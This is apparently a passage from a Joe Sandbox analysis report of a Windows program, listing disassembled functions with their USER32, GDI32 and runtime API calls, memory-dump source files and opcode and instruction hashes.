                                                                              • GetObjectA.GDI32(00000000,00000054,?), ref: 00EB81B6
                                                                              • CreateDIBSection.GDI32(?,?), ref: 00EB8218
                                                                              • CreateCompatibleDC.GDI32(?), ref: 00EB8252
                                                                              • SelectObject.GDI32(?,00000000), ref: 00EB826B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Object$Create$CompatibleSelect$H_prolog3_Section
                                                                              • String ID: (
                                                                              • API String ID: 1338481308-3887548279
                                                                              • Opcode ID: c80a24a15128fda3061befb660e780d32f335d8456d2769fcfa6efaf5acace08
                                                                              • Instruction ID: aa3236d161e63c32786bb69f971665552772d503d7e1a1a39ff32f58e4e0572c
                                                                              • Opcode Fuzzy Hash: c80a24a15128fda3061befb660e780d32f335d8456d2769fcfa6efaf5acace08
                                                                              • Instruction Fuzzy Hash: C2A11474901619DFDB61DF64DD85BEABBF9BF08300F1081A9E84DA7251DB30AA84CF20
                                                                              Function 00EA60E2 Relevance: 24.2, APIs: 16, Instructions: 176windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00EA6175
                                                                              • SendMessageA.USER32(00000000,00000084,00000000,?), ref: 00EA6193
                                                                              • ReleaseCapture.USER32 ref: 00EA61CE
                                                                              • GetMessageA.USER32(?,00000000,000000A1,000000A1), ref: 00EA61DE
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00EA61F0
                                                                              • DispatchMessageA.USER32(?), ref: 00EA61F7
                                                                              • DispatchMessageA.USER32(?), ref: 00EA62AE
                                                                              • GetCursorPos.USER32(00000000), ref: 00EA62B8
                                                                              • PeekMessageA.USER32(?,00000000,?,?,00000001), ref: 00EA62D9
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Peek$Dispatch$CaptureCursorReleaseSend
                                                                              • String ID:
                                                                              • API String ID: 597789953-0
                                                                              • Opcode ID: eb3884761555e719147bd39e5e724e59593cb94451f6811f451396352dfffc31
                                                                              • Instruction ID: 5044c08910bdce1ebf674d7c74fb56700079c69ab80ad83d289878f1aaa8b3da
                                                                              • Opcode Fuzzy Hash: eb3884761555e719147bd39e5e724e59593cb94451f6811f451396352dfffc31
                                                                              • Instruction Fuzzy Hash: 0251B170601200BFEB261B508C89FBDBA79FB5FB05F189129F546BD190C76ABC90DB61
                                                                              Function 00EAA2BC Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 404windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00EAA2C6
                                                                              • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00EAA4BF
                                                                              • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00EAA68C
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00EAA6B2
                                                                              • UpdateWindow.USER32(?), ref: 00EAA6D4
                                                                              • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00EAA791
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00EAA7B7
                                                                              • UpdateWindow.USER32(?), ref: 00EAA7D9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$InvalidateRectUpdateWindow$H_prolog3_
                                                                              • String ID: :/\
                                                                              • API String ID: 2009545923-2793184486
                                                                              • Opcode ID: 61de22a503d53aad859fb68ac03f0d836ea12efb36f1b100d11a5a8d335f6f5e
                                                                              • Instruction ID: b7e7959016c6e14059f99b710cd7f916290bc0f0a6bf658b626f180f628acea5
                                                                              • Opcode Fuzzy Hash: 61de22a503d53aad859fb68ac03f0d836ea12efb36f1b100d11a5a8d335f6f5e
                                                                              • Instruction Fuzzy Hash: 50F14C35600214DFCB25EB64CD99BED77B5BF89310F1411E8E50AAB2A2CB34AE85CF51
                                                                              Function 00EA62E8 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCapture.USER32 ref: 00EA6303
                                                                              • WindowFromPoint.USER32(00000000,?), ref: 00EA6311
                                                                              • GetActiveWindow.USER32 ref: 00EA6332
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00EA634C
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EA635C
                                                                              • GetDesktopWindow.USER32 ref: 00EA6371
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Thread$ActiveCaptureCurrentDesktopFromPointProcess
                                                                              • String ID:
                                                                              • API String ID: 1298419125-0
                                                                              • Opcode ID: 23c323221d4f9051a7ca530f9cee55e9627df01887dbc8cd50a3e8a7f13786d4
                                                                              • Instruction ID: 65c92ae848f3e035d6f5aeec18ee38f83abeed645af698f7ca5cd7d3cb395a45
                                                                              • Opcode Fuzzy Hash: 23c323221d4f9051a7ca530f9cee55e9627df01887dbc8cd50a3e8a7f13786d4
                                                                              • Instruction Fuzzy Hash: B1313E31900215EFCF269BB4D8486AEBBB0BF5F309F145465E441BA150D735BD56CBA0
                                                                              Function 00FBE331 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 128COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3.LIBCMT ref: 00FBE338
                                                                                • Part of subcall function 00F5290E: __EH_prolog3.LIBCMT ref: 00F52915
                                                                                • Part of subcall function 00F8C170: SetRectEmpty.USER32(?), ref: 00F8C1AB
                                                                              • SetRectEmpty.USER32(?), ref: 00FBE47C
                                                                              • SetRectEmpty.USER32 ref: 00FBE48D
                                                                              • SetRectEmpty.USER32(8C3A2FF3), ref: 00FBE494
                                                                              • _strlen.LIBCMT ref: 00FBE4E8
                                                                              • _strlen.LIBCMT ref: 00FBE501
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: EmptyRect$H_prolog3_strlen
                                                                              • String ID: False$True
                                                                              • API String ID: 4048534651-1895882422
                                                                              • Opcode ID: 09bb5ec82fd86d3ee06be9cc08d7c7cbed576a0ee50d946f09ee2c1938037a26
                                                                              • Instruction ID: 73cafdb5e5851700a16b7357fa3d7605bcbe1690f90adb60b291921db4bf4be0
                                                                              • Opcode Fuzzy Hash: 09bb5ec82fd86d3ee06be9cc08d7c7cbed576a0ee50d946f09ee2c1938037a26
                                                                              • Instruction Fuzzy Hash: 2B61D2B09056019FCB0ADF29D585BE9BBE8BF08300F1881BEE85D9F396CB741644CB65
                                                                              Function 00ED23F0 Relevance: 13.8, APIs: 9, Instructions: 255windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00ED23F7
                                                                              • UnionRect.USER32(?,?,?), ref: 00ED245D
                                                                              • EqualRect.USER32(?,?), ref: 00ED246B
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00ED24A2
                                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00ED24D0
                                                                              • SelectObject.GDI32(?,00000000), ref: 00ED2536
                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,00000001,?,?,00CC0020), ref: 00ED255E
                                                                              • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 00ED26A8
                                                                              • DeleteObject.GDI32(?), ref: 00ED26C2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: CompatibleCreateObjectRect$BitmapDeleteEqualH_prolog3_SelectUnion
                                                                              • String ID:
                                                                              • API String ID: 1408062871-0
                                                                              • Opcode ID: 8c869ff7263153ef050ebc966b1155724004ab684ea89b94a26eec2e76e7f3d7
                                                                              • Instruction ID: f66c17d5eb7a412d8c7086384e8b5408f1de4184665be9572895e23cef103ccd
                                                                              • Opcode Fuzzy Hash: 8c869ff7263153ef050ebc966b1155724004ab684ea89b94a26eec2e76e7f3d7
                                                                              • Instruction Fuzzy Hash: 86B1F071E002199FCF15CFA8D984A9DBBB9FF58304F14812AE919BB355DB30A942CF90
                                                                              Function 00EEE002 Relevance: 12.2, APIs: 8, Instructions: 169windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ReleaseCapture.USER32 ref: 00EEE03C
                                                                              • IsWindow.USER32(?), ref: 00EEE05D
                                                                              • DestroyWindow.USER32(?), ref: 00EEE06D
                                                                              • GetParent.USER32(?), ref: 00EEE093
                                                                              • IsRectEmpty.USER32(?), ref: 00EEE165
                                                                              • IsWindowVisible.USER32(?), ref: 00EEE1B1
                                                                              • MapWindowPoints.USER32(?,?,00000000,00000001), ref: 00EEE1C7
                                                                              • SendMessageA.USER32(?,00000202,?,?), ref: 00EEE1E6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CaptureDestroyEmptyMessageParentPointsRectReleaseSendVisible
                                                                              • String ID:
                                                                              • API String ID: 3509494761-0
                                                                              • Opcode ID: 4c9d83e7bab0997cb0db5fdae2535fd6f0c1845168e46ddc9d4aae4e81acc34d
                                                                              • Instruction ID: a103e472cde7229775b1d7a728a6885fbda8cde424503c9051f0f7dcf4e09638
                                                                              • Opcode Fuzzy Hash: 4c9d83e7bab0997cb0db5fdae2535fd6f0c1845168e46ddc9d4aae4e81acc34d
                                                                              • Instruction Fuzzy Hash: 5B51C1306002559FDF269F61C899BBA3BA5BF09304F0410B8FC46AF396DB799D44CB91
                                                                              Function 00EBC2EB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3.LIBCMT ref: 00EBC2F2
                                                                              • CreateCompatibleDC.GDI32(?), ref: 00EBC341
                                                                              • CreateCompatibleDC.GDI32(?), ref: 00EBC353
                                                                              • SelectObject.GDI32(?,?), ref: 00EBC370
                                                                              • SelectObject.GDI32(?,00000000), ref: 00EBC388
                                                                              • BitBlt.GDI32(?,?,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00EBC3AE
                                                                              • SelectObject.GDI32(?,00000000), ref: 00EBC3BC
                                                                              • SelectObject.GDI32(?,00000000), ref: 00EBC3CA
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectSelect$CompatibleCreate$H_prolog3
                                                                              • String ID:
                                                                              • API String ID: 2106698553-0
                                                                              • Opcode ID: c7654a72204debaee7d6e0188d0b3ccca5d88fc54492f19ff2d467f0b8a4606e
                                                                              • Instruction ID: 45edf62ddcee183813075ae0cf91e7f52208a3a0de63c76b75a3f4576971e129
                                                                              • Opcode Fuzzy Hash: c7654a72204debaee7d6e0188d0b3ccca5d88fc54492f19ff2d467f0b8a4606e
                                                                              • Instruction Fuzzy Hash: CC315731905219EFDB16EFA0CD55AEEBBB8BF18300F205028F546B6152CB75AE04CBA1
                                                                              Function 00EA8204 Relevance: 12.1, APIs: 8, Instructions: 77COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RealChildWindowFromPoint.USER32(?,?,?), ref: 00EA8228
                                                                              • ClientToScreen.USER32(?,?), ref: 00EA8243
                                                                              • GetWindow.USER32(?,00000005), ref: 00EA824C
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00EA825C
                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00EA826C
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00EA828A
                                                                              • PtInRect.USER32(?,?,?), ref: 00EA829A
                                                                              • GetWindow.USER32(00000000,00000002), ref: 00EA82A9
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rect$ChildClientCtrlFromLongPointRealScreen
                                                                              • String ID:
                                                                              • API String ID: 151369081-0
                                                                              • Opcode ID: 6aea3e1929fddecbeb78f04813b7d2aba3ad2fe9e12633c8c47fd15a4aab75d3
                                                                              • Instruction ID: 465af0cd4e7e34ed254cb6b9b155da85237152e4b55ce6bce49fd1f13bf14037
                                                                              • Opcode Fuzzy Hash: 6aea3e1929fddecbeb78f04813b7d2aba3ad2fe9e12633c8c47fd15a4aab75d3
                                                                              • Instruction Fuzzy Hash: 5E21927190161AAFCB229FA8CD48AAFB7B8FF09350F104129F404F7240DB39D9018BA0
                                                                              Function 00EB6383 Relevance: 12.1, APIs: 8, Instructions: 59COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(00000020), ref: 00EB63B2
                                                                              • GetSystemMetrics.USER32(00000021), ref: 00EB63BC
                                                                              • GetSystemMetrics.USER32(00000005), ref: 00EB63CB
                                                                              • GetSystemMetrics.USER32(00000006), ref: 00EB63D5
                                                                              • GetSystemMetrics.USER32(0000005C), ref: 00EB63E9
                                                                              • GetSystemMetrics.USER32(0000005C), ref: 00EB63F3
                                                                              • GetSystemMetrics.USER32(00000007), ref: 00EB640B
                                                                              • GetSystemMetrics.USER32(00000008), ref: 00EB6415
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem
                                                                              • String ID:
                                                                              • API String ID: 4116985748-0
                                                                              • Opcode ID: 9377e7ef7270f42445346026111c7a67de48d0cc9ffb90d212adabfadd902413
                                                                              • Instruction ID: 124022329e107e74e2179c88405a78d32471369a3825ee15e8b2cffca1c3b362
                                                                              • Opcode Fuzzy Hash: 9377e7ef7270f42445346026111c7a67de48d0cc9ffb90d212adabfadd902413
                                                                              • Instruction Fuzzy Hash: D3116DB2580B05AFD7325FA4990C756BBE4FF10B15F10943DE6D9DA580DA799880CB11
                                                                              Function 00F0E12A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 225COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 00F0E166
                                                                              • IsRectEmpty.USER32(?), ref: 00F0E18B
                                                                              • FillRect.USER32(?,?,00000000), ref: 00F0E252
                                                                              • FillRect.USER32(?,?,00000000), ref: 00F0E288
                                                                              • InflateRect.USER32(?,00000000,000000FF), ref: 00F0E2C5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Fill$EmptyInflateParent
                                                                              • String ID: %I
                                                                              • API String ID: 2418387936-1563208197
                                                                              • Opcode ID: 6d9cdd52a506b1a91de351bfc09fe0b674fa0edf782a5674269b8730a1697bd5
                                                                              • Instruction ID: 4a8b6a5ee3f5cbf1a8ef6835545649a9c0c76403eb698231e949a5ba8e72f7a6
                                                                              • Opcode Fuzzy Hash: 6d9cdd52a506b1a91de351bfc09fe0b674fa0edf782a5674269b8730a1697bd5
                                                                              • Instruction Fuzzy Hash: 9A71C632E006069BCF15EFA4C846DAF7BBAFF4A310F044519FD10AB281DB75E901AB91
                                                                              Function 00FEC23F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00FEBF89: _free.LIBCMT ref: 00FEBFAE
                                                                              • _free.LIBCMT ref: 00FEC28D
                                                                                • Part of subcall function 00FE26C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FE2F36,00000000,00000000,01063F78,00000000,00000007,000000FF,?,00E86776,00E9945F,00000000,?), ref: 00FE26DE
                                                                                • Part of subcall function 00FE26C8: GetLastError.KERNEL32(00000000,?,00FE2F36,00000000,00000000,01063F78,00000000,00000007,000000FF,?,00E86776,00E9945F,00000000,?,?,00E98A17), ref: 00FE26F0
                                                                              • _free.LIBCMT ref: 00FEC298
                                                                              • _free.LIBCMT ref: 00FEC2A3
                                                                              • _free.LIBCMT ref: 00FEC2F7
                                                                              • _free.LIBCMT ref: 00FEC302
                                                                              • _free.LIBCMT ref: 00FEC30D
                                                                              • _free.LIBCMT ref: 00FEC318
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538021434.000000000105A000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538115949.000000000105C000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538190401.000000000105F000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001065000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3538250784.0000000001197000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_e80000_wic.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 57b9c50bff66dd14b9f25f69197750c5cd4ee71953c009ff55a3012b96ca8832
                                                                              • Instruction ID: b4f1481ab483ca1227b8893c139f459a7f0079a91c6fa97ddb27280e9fa5925f
                                                                              • Opcode Fuzzy Hash: 57b9c50bff66dd14b9f25f69197750c5cd4ee71953c009ff55a3012b96ca8832
                                                                              • Instruction Fuzzy Hash: 1A112171541BC8AAD571B7F2CC07FCBBB9C9F04700F409915B299660A2DB69F9087A51
                                                                              Function 00EA80AF Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ClientToScreen.USER32(?,?), ref: 00EA80C9
                                                                              • GetWindow.USER32(?,00000005), ref: 00EA80D2
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00EA80E1
                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00EA80F1
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00EA810F
                                                                              • PtInRect.USER32(?,?,?), ref: 00EA811F
                                                                              • GetWindow.USER32(00000000,00000002), ref: 00EA812C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3537035378.0000000000E81000.00000020.00000001.01000000.00000018.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3536917498.0000000000E80000.00000002.00000001.01000000.00000018.sdmpDownload File
